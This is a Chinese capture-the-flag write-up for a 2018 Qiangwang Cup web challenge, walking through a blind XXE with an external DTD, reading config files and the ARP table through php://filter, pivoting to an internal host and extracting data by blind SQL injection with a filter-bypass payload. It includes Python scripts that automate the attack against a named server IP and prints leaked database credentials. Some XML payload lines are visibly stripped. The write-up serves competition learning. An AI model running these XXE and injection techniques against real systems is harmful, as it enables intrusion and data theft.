強網杯-教育機構的培訓平台
安恆網路空間安全講武堂
能聊 能撩 能漲姿勢~
關注
這題比賽的時候好像是0解,賽後趁著題目沒關各種踩坑後後才做出來...
給了域名一打開發現未備案,那就用ip訪問唄,先按照常規滲透思路來,查了下whois發現開了隱私保護,nmap掃了下埠發現還開了22和33899。總不可能是22埠爆破吧,那麼訪問33899埠。咋一看好像跟80埠的一樣,然而在郵件頁面卻有不同。瀏覽了一會發現站點輸入點不多就一個發郵件功能
測試了一下發現80埠的發郵件功能好像並沒有什麼卵用,於是開始主攻33899埠。。測試了xss和sql注入無果後隨手打個xxe發現出現xml報錯
那麼很明顯是個blind xxe漏洞了,但是一番測試後怎麼都收不到請求,猜想像以前08067ctf那樣過濾了實體引用,於是把實體引用定義在了dtd里,果然收到了請求,payload
xml
%dtd;]>
dtd
">
%all;
%send;
那麼我們嘗試用偽協議讀一下源碼,發現沒有價值的信息,改下dtd讀一下config.php
//error_reporting(E_ALL^E_NOTICE^E_WARNING);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/52dandan.club/");
define(FLAG_SIG, 1);
define(SECRETFILE,"/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431");
//global $error_msg;
$DBHOST = "127.0.0.1";
$DBUSER = "root";
$DBPASS = "QWB2018qwb@)!*";
//$DBPASS = "";
$DBNAME = "QWB1234";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME,3306);
if(mysqli_connect_errno()){
echo "no sql connection!!!".mysqli_connect_error();
$mysqli=null;
die();
}
?>
得到flag第一部分
5bdd3b0ba1fcb40
找了一圈後沒找到第二部分於是開始內網滲透,首先根據提示arp -a聯想到讀取arp表,於是嘗試讀取proc/net/arp發現出錯
但是並不是文件不存在報的錯,於是猜想是沒有許可權或者文件太大無法讀取,在網上搜索了一番後找到了一種用zlib壓縮數據的方法
php://filter/read=zlib.deflate/convert.base64-encode/resource=/proc/net/arp
打了一下後成功讀取到數據,然後用腳本還原一下即可出數據
$str = file_get_contents("./flag.txt");
$str = str_replace(" ","+",$str);
function decode($str){
$str = base64_decode($str);
$str = gzinflate($str);
return $str;
}
print_r(decode($str));
?>
然後尼瑪給了一堆ip...
IP address HW type Flags HW address Mask Device 192.168.223.127 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.144 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.17 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.143 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.125 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.158 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.161 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.141 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.156 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.139 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.154 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.134 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.137 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.152 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.132 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.151 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.130 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.149 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.18 0x1 0x2 02:42:c0:a8:df:12 * eth0 192.168.223.128 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.126 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.147 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.1 0x1 0x2 02:42:91:f9:c9:d4 * eth0 192.168.223.142 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.145 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.160 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.140 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.159 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.138 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.157 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.136 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.155 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.135 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.150 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.153 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.133 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.148 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.131 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.146 0x1 0x0 00:00:00:00:00:00 * eth0 192.168.223.129 0x1 0x0 00:00:00:00:00:00 * eth0
隨便訪問一個發現返回沒有該主機,猜測是靜態寫入了一堆垃圾數據,然后里面有一個應該是真正的內網地址。所以寫了個腳本(這裡簡單介紹一下腳本的思路,因為是內網環境,腳本並不是那麼好寫,大致思路是在伺服器上寫一個腳本掛在伺服器上一邊動態修改dtd文件一邊發包)得出
192.168.223.18是真實內網地址
import requests
url = "http://39.107.33.75:33899/common.php"
s = requests.Session()
result = ""
data = {"name":"pupiles","email":"ssadasdasd@gmail.com",
"comment":"""
%dtd;]>
"""
}
with open("ip.txt", "r") as f:
ip = f.read().split("
")
for i in range(40):
f = open("./evil.dtd","w")
payload2 = """
">
%all;
%send;""".format(ip[i])
f.write(payload2)
f.close()
print payload2
r = s.post(url,data=data)
#print r.contetn
if "No route to host in" not in r.content:
print ip[i]
break
這時候發現這個ip的主頁同樣由於數據過大無法直接返回,這裡又踩了一個坑,按理說這裡是要讀內網的文件應該不能用php偽協議了吧,然而嘗試了各種方法無果後回到最初的方法
php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/
發現居然真的可以,原因是內網服務開啟了url_open,但是發現index.html主頁並沒有flag,於是嘗試爆破路徑發現一個test.php,嘗試讀取後返回結果如下
I Love DanDanOnline Shop System Testing!!!Our online sales system is coming soon.Now open the test interface to internal employees!!!This time is the last testing before online!!!So this time,we test the query and search interface at once !!!!start testing~~~~your goods"s name is "",your goods"s price is "",your goods"s quantity is "",your goods"s total is "",testing finish~~~~
剛看到這裡的時候我一定是腦殘了才會去以為是隱寫,明顯的傳參數TT,於是接著爆破參數,嘗試了各種參數id,name,price,quantity,total無果後仔細理解了一下原文意思,大致是這個參數要包含商品的名字,價格和總價,於是猜測不是good就是shop,結果發現是shop,然後嘗試注入,到這裡才算是真正入坑,因為內網實在不方面測試sql盲注,而且還過濾了一堆字元,肝了好久實在肝不出來(發現好多大師傅都卡這了)。最後實在沒辦法去問了出題人,出題人給了我一個白名單
$whitelist = "?`"0123456789abcdefghijklmnopqrstuvwxyz{}()_.+-""
過濾了,=等關鍵字元,還好沒有過濾關鍵詞,一番fuzz後找到一個可用的payload
php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3"-(case%a0when((select%a0database())like%a0binary("________"))then(0)else(1)end)-"1
剩下就是寫腳本盲注,flag第二部分在total欄位里
payload
import requests
url = "http://39.107.33.75:33899/common.php"
s = requests.Session()
result = ""
data = {"name":"pupiles","email":"ssadasdasd@gmail.com",
"comment":"""
%dtd;]>
"""
}
#p1 = "database()"
#p2 = "select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where table_schema%a0like%a0"qwbinner""
#p3 = "select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_name%a0like%a0"albert_shop""
for i in range(0,28):
for j in range(48,123):
f = open("./evil.dtd","w")
payload2 = """
">
%all;
%send;""".format("_"*i+chr(j)+"_"*(27-i))
f.write(payload2)
f.close()
print "test {}".format(chr(j))
r = s.post(url,data=data)
#print r.contetn
if "Oti3a3LeLPdkPkqKF84xs=" in r.content and chr(j)!="_":
result += chr(j)
print chr(j)
break
print result
注意用這個payload的時候要先猜長度
for i in range(1,30):
f = open("./evil.dtd","w")
payload2 = """
">
%all;
%send;""".format("_"*i)
綜上所訴,flag為
QWB
